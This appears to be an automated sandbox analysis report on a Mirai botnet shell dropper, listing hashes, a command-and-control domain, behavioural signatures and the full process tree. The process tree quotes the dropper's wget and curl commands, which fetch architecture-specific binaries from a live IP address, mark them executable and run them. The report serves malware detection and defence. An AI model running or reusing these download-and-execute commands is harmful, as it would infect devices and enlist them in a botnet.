Analysis
-
max time kernel
115s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
19-12-2024 07:08
Static task
static1
Behavioral task
behavioral1
Sample
feelme420.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
feelme420.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
feelme420.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
feelme420.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
feelme420.sh
-
Size
3KB
-
MD5
22e9d65b991f00de3a52071664dc52f9
-
SHA1
2b6dd972572c4c72ecf43bb7b66eebe776cd0360
-
SHA256
7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
-
SHA512
eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted
mirai
chernobyl.stressing.world
Signatures
-
Mirai family
-
Contacts a large (12958) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1544 chmod 1586 chmod 1596 chmod 1626 chmod 1646 chmod 1534 chmod 1574 chmod 1554 chmod 1606 chmod 1616 chmod 1636 chmod 1656 chmod 1514 chmod 1524 chmod 1564 chmod 1666 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/f331m3420 1515 f331m3420 /tmp/f331m3420 1525 f331m3420 /tmp/f331m3420 1535 f331m3420 /tmp/f331m3420 1545 f331m3420 /tmp/f331m3420 1555 f331m3420 /tmp/f331m3420 1565 f331m3420 /tmp/f331m3420 1575 f331m3420 /tmp/f331m3420 1587 f331m3420 /tmp/f331m3420 1597 f331m3420 /tmp/f331m3420 1607 f331m3420 /tmp/f331m3420 1617 f331m3420 /tmp/f331m3420 1627 f331m3420 /tmp/f331m3420 1637 f331m3420 /tmp/f331m3420 1647 f331m3420 /tmp/f331m3420 1657 f331m3420 /tmp/f331m3420 1667 f331m3420 -
Modifies Watchdog functionality 1 TTPs 32 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 15 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 32 IoCs
description ioc Process File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 -
Reads process memory 1 TTPs 26 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/448/maps f331m3420 File opened for reading /proc/461/maps f331m3420 File opened for reading /proc/462/maps f331m3420 File opened for reading /proc/549/maps f331m3420 File opened for reading /proc/671/maps f331m3420 File opened for reading /proc/446/maps f331m3420 File opened for reading /proc/464/maps f331m3420 File opened for reading /proc/475/maps f331m3420 File opened for reading /proc/516/maps f331m3420 File opened for reading /proc/535/maps f331m3420 File opened for reading /proc/547/maps f331m3420 File opened for reading /proc/416/maps f331m3420 File opened for reading /proc/454/maps f331m3420 File opened for reading /proc/467/maps f331m3420 File opened for reading /proc/469/maps f331m3420 File opened for reading /proc/517/maps f331m3420 File opened for reading /proc/581/maps f331m3420 File opened for reading /proc/685/maps f331m3420 File opened for reading /proc/449/maps f331m3420 File opened for reading /proc/474/maps f331m3420 File opened for reading /proc/482/maps f331m3420 File opened for reading /proc/494/maps f331m3420 File opened for reading /proc/606/maps f331m3420 File opened for reading /proc/607/maps f331m3420 File opened for reading /proc/703/maps f331m3420 File opened for reading /proc/460/maps f331m3420 -
Changes its process name 16 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 1515 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1525 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1535 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1545 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1555 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1565 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1575 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1587 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1597 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1607 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1617 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1627 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1637 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1647 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1657 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1667 f331m3420 -
Reads system network configuration 1 TTPs 15 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1518 wget 1522 curl -
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/feelme420.i586 curl File opened for modification /tmp/feelme420.sh4 wget File opened for modification /tmp/feelme420.sh4 curl File opened for modification /tmp/feelme420.x86_64 wget File opened for modification /tmp/feelme420.i686 wget File opened for modification /tmp/feelme420.i486 wget File opened for modification /tmp/feelme420.arm curl File opened for modification /tmp/feelme420.ppc wget File opened for modification /tmp/feelme420.m68k wget File opened for modification /tmp/feelme420.spc curl File opened for modification /tmp/feelme420.mips wget File opened for modification /tmp/feelme420.mpsl curl File opened for modification /tmp/feelme420.m68k curl File opened for modification /tmp/feelme420.arc curl File opened for modification /tmp/feelme420.mips curl File opened for modification /tmp/feelme420.arm6 wget File opened for modification /tmp/feelme420.i686 curl File opened for modification /tmp/feelme420.arm7 curl File opened for modification /tmp/feelme420.ppc curl File opened for modification /tmp/feelme420.spc wget File opened for modification /tmp/feelme420.arc wget File opened for modification /tmp/feelme420.x86 wget File opened for modification /tmp/feelme420.arm5 wget File opened for modification /tmp/feelme420.arm7 wget File opened for modification /tmp/feelme420.i486 curl File opened for modification /tmp/f331m3420 feelme420.sh File opened for modification /tmp/feelme420.arm5 curl File opened for modification /tmp/feelme420.arm6 curl File opened for modification /tmp/feelme420.x86_64 curl File opened for modification /tmp/feelme420.x86 curl File opened for modification /tmp/feelme420.mpsl wget
Processes
-
/tmp/feelme420.sh/tmp/feelme420.sh1⤵
- Writes file to tmp directory
PID:1507 -
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:1508
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/catcat feelme420.x862⤵PID:1513
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1514
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:1515
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1518
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1522
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1524
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1525
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:1528
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1535
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1545
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:1548
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:1552
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1554
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1555
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:1558
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1565
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:1568
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx9 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-timedated.service-3dQcR32⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1575
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:1580
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:1584
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1586
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1587
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:1590
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1597
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:1600
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1607
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:1610
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:1614
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1616
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1617
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:1620
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1627
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:1630
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1637
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:1640
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1647
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:1650
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1657
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i5862⤵PID:1660
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i5862⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/chmodchmod +x config-err-N4UXNv f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_mq4tyeav snap-private-tmp ssh-N3bpU2WW2hc3 systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-bolt.service-x3nVew systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-colord.service-TbVInB systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-ModemManager.service-XAyolV systemd-private-2913b5bf32bc4d71a665dc8cdd9827a0-systemd-resolved.service-93JXx92⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Reads process memory
- Changes its process name
- Reads system network configuration
PID:1667
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
68KB
